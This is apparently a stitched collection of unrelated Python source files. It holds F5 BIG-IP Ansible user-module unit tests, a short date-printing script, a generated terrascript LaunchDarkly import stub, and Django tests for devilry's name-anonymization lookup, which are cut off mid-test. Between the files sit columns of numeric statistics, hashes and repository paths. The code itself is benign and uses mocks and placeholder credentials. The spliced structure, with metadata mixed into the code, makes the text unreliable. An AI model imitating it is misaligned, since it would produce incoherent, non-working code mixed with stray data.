# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(
params=dict(
user='admin',
shell='tmsh'
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'none'
def test_update_user_shell_to_none_shell_attribute_missing(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='none',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'Common', 'role': 'guest'}]
current = Parameters(
params=dict(
user='admin',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is False
assert 'shell' not in results  # results is a dict, so key membership (not hasattr) is the right check
def test_update_user_shell_to_bash(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [{'name': 'all', 'role': 'admin'}]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
results = mm.exec_module()
assert results['changed'] is True
assert results['shell'] == 'bash'
def test_update_user_shell_to_bash_multiple_roles(self, *args):
set_module_args(dict(
username_credential='someuser',
shell='bash',
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Configure the parameters that would be returned by querying the
# remote device
access = [
{'name': 'Common', 'role': 'operator'},
{'name': 'all', 'role': 'guest'}
]
current = Parameters(
params=dict(
user='admin',
shell='tmsh',
partition_access=access
)
)
# Override methods to force specific logic in the module to happen
upm = UnpartitionedManager(module=module, params=module.params)
upm.exists = Mock(return_value=True)
upm.update_on_device = Mock(return_value=True)
upm.read_current_from_device = Mock(return_value=current)
mm = ModuleManager(module=module)
mm.is_version_less_than_13 = Mock(return_value=True)
mm.get_manager = Mock(return_value=upm)
msg = "Shell access is only available to 'admin' or " \
"'resource-admin' roles."
with pytest.raises(F5ModuleError) as ex:
mm.exec_module()
assert str(ex.value) == msg
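# Editorial note on the shared pattern above (a summary, not part of the
# original module): every test builds an AnsibleModule from ArgumentSpec,
# constructs either PartitionedManager (TMOS >= 13) or UnpartitionedManager
# (TMOS < 13), and replaces the device I/O methods (exists, create_on_device,
# update_on_device, read_current_from_device) with Mock objects. ModuleManager
# is then pinned to that manager via mm.get_manager, so exec_module() exercises
# only the module's local logic and never contacts a real BIG-IP.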
| 33.528345
| 108
| 0.606046
| 3,227
| 29,572
| 5.331577
| 0.064766
| 0.063296
| 0.082825
| 0.048591
| 0.937693
| 0.937228
| 0.933973
| 0.93095
| 0.925022
| 0.909561
| 0
| 0.005328
| 0.30184
| 29,572
| 881
| 109
| 33.566402
| 0.828005
| 0.080143
| 0
| 0.827637
| 0
| 0
| 0.08949
| 0.013773
| 0
| 0
| 0
| 0
| 0.062407
| 1
| 0.041605
| false
| 0.071322
| 0.016345
| 0
| 0.065379
| 0.001486
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4a662851c60eb7465797569d448c179069614b16
| 99
|
py
|
Python
|
module00/ex05/kata02.py
|
MedAymenF/42AI-Python-bootcamp
|
41af2221b95b305ee08ee8f582e68700f1a8c32b
|
[
"Apache-2.0"
] | null | null | null |
module00/ex05/kata02.py
|
MedAymenF/42AI-Python-bootcamp
|
41af2221b95b305ee08ee8f582e68700f1a8c32b
|
[
"Apache-2.0"
] | null | null | null |
module00/ex05/kata02.py
|
MedAymenF/42AI-Python-bootcamp
|
41af2221b95b305ee08ee8f582e68700f1a8c32b
|
[
"Apache-2.0"
] | null | null | null |
t = (3, 30, 2019, 9, 25)
print("{:02}/{:02}/{} {:02}:{:02}".format(t[3], t[4], t[2], t[0], t[1]))
| 24.75
| 72
| 0.40404
| 22
| 99
| 1.818182
| 0.590909
| 0.3
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.270588
| 0.141414
| 99
| 3
| 73
| 33
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0.262626
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
4a986e681f67b00e1a2106a4312f605dc21d2121
| 412
|
py
|
Python
|
terrascript/resource/launchdarkly.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/launchdarkly.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/launchdarkly.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/launchdarkly.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:56 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.launchdarkly
#
# instead of
#
# >>> import terrascript.resource.launchdarkly.launchdarkly
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.launchdarkly.launchdarkly import *
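# A hypothetical usage sketch of the shortcut import described above. The
# Terrascript class is part of python-terrascript, but the resource class
# name below is an assumption about what the generated module exports:
#
# >>> import terrascript
# >>> import terrascript.resource.launchdarkly
# >>> ts = terrascript.Terrascript()
# >>> ts += terrascript.resource.launchdarkly.launchdarkly_project(
# ...     "example", name="Example project", key="example-project")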
| 27.466667
| 73
| 0.764563
| 49
| 412
| 6.428571
| 0.693878
| 0.24127
| 0.393651
| 0.234921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033241
| 0.123786
| 412
| 14
| 74
| 29.428571
| 0.839335
| 0.788835
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4a9cc9181a32cd8c52d004cb19d4338a4403b77b
| 30,450
|
py
|
Python
|
devilry/apps/core/tests/test_group_user_lookup.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/apps/core/tests/test_group_user_lookup.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/apps/core/tests/test_group_user_lookup.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
from django import test
from django.conf import settings
from model_bakery import baker
from devilry.apps.core import models as core_models
from devilry.apps.core.group_user_lookup import GroupUserLookup
class TestGroupUserLookupViewroleStudent(test.TestCase):
viewrole = 'student'
#
# Test with user role as 'admin'.
# This is the role of the user a student requests the name for.
#
def test_user_role_admin_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_fully_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_semi_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
#
# Test with user role as 'examiner'.
# This is the role of the user a student requests the name for.
#
def test_user_role_examiner_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
def test_user_role_examiner_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_examineruser, user_role='examiner'),
'testexaminer@example.com')
def test_user_role_examiner_get_anonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Some anonymous name')
def test_user_role_examiner_get_anonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner',
shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_examineruser, user_role='examiner'),
'Some anonymous name')
def test_user_role_examiner_get_anonymized_longname_relatedexaminer_does_not_exist(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner',
shortname='testexaminer@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'User removed from semester')
def test_user_role_examiner_user_is_examiner_and_student_is_not_anonymized_to_themselves(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner',
shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=testuser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=testuser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
#
# Test with user role as 'student'.
# This is the role of the user a student requests the name for.
#
def test_user_role_student_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
def test_user_role_student_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_studentuser, user_role='student'),
'teststudent@example.com')
def test_user_role_student_does_not_need_to_be_anonymized_for_other_students_assignment_fully_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
def test_user_role_student_does_not_need_to_be_anonymized_for_other_students_assignment_semi_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
class TestGroupUserLookupViewroleExaminer(test.TestCase):
viewrole = 'examiner'
#
# Test with user role as 'admin'.
# This is the role of the user an examiner requests the name for.
#
def test_user_role_admin_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_fully_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
def test_user_role_admin_get_unanonymized_longname_assignment_semi_anonymized(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_adminuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Admin',
shortname='testadmin@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_adminuser, user_role='admin'),
'Test Admin (testadmin@example.com)')
#
# Test with user role as 'student'.
# This is the role of the user an examiner requests the name for.
#
def test_user_role_student_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Test Student (teststudent@example.com)')
def test_user_role_student_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_studentuser, user_role='student'),
'teststudent@example.com')
def test_user_role_student_get_anonymized_longname_for_assignment_uses_custom_candidate_ids(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS,
uses_custom_candidate_ids=True)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup,
relatedstudent__user=test_studentuser, candidate_id='1234',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'1234')
def test_user_role_student_get_anonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__automatic_anonymous_id='Some anonymous name',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Some anonymous name')
def test_user_role_student_get_anonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=test_studentuser,
relatedstudent__automatic_anonymous_id='Some anonymous name',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_studentuser, user_role='student'),
'Some anonymous name')
def test_user_role_student_get_anonymized_longname_candidate_does_not_exist(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
baker.make('core.RelatedStudent', period=testassignment.parentnode, user=test_studentuser,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'Some anonymous name')
def test_user_role_student_get_anonymized_longname_no_candidate_or_relatedstudent(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_studentuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student', shortname='teststudent@example.com')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_studentuser, user_role='student'),
'User removed from semester')
def test_user_role_student_user_is_student_and_examiner_is_not_anonymized_to_themselves(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Student',
shortname='teststudent@example.com')
baker.make('core.Candidate', assignment_group=testgroup, relatedstudent__user=testuser,
relatedstudent__automatic_anonymous_id='Some anonymous name',
relatedstudent__period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=testuser, user_role='student'),
'Test Student (teststudent@example.com)')
#
# Test with user role as 'examiner'.
# This is the role of the user an examiner requests the name for.
#
def test_user_role_examiner_get_unanonymized_longname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
def test_user_role_examiner_get_unanonymized_shortname(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode)
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(
group_user_lookup.get_plaintext_short_name_from_user(user=test_examineruser, user_role='examiner'),
'testexaminer@example.com')
def test_user_role_examiner_does_not_need_to_be_anonymized_assignment_fully_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
test_examineruser = baker.make(settings.AUTH_USER_MODEL, fullname='Test Examiner', shortname='testexaminer@example.com')
baker.make('core.RelatedExaminer', user=test_examineruser, period=testassignment.parentnode,
automatic_anonymous_id='Some anonymous name')
group_user_lookup = GroupUserLookup(assignment=testassignment, group=testgroup,
requestuser=testuser, requestuser_devilryrole=self.viewrole)
self.assertEqual(group_user_lookup.get_long_name_from_user(user=test_examineruser, user_role='examiner'),
'Test Examiner (testexaminer@example.com)')
def test_user_role_examiner_does_not_need_to_be_anonymized_assignment_semi_anonymous(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
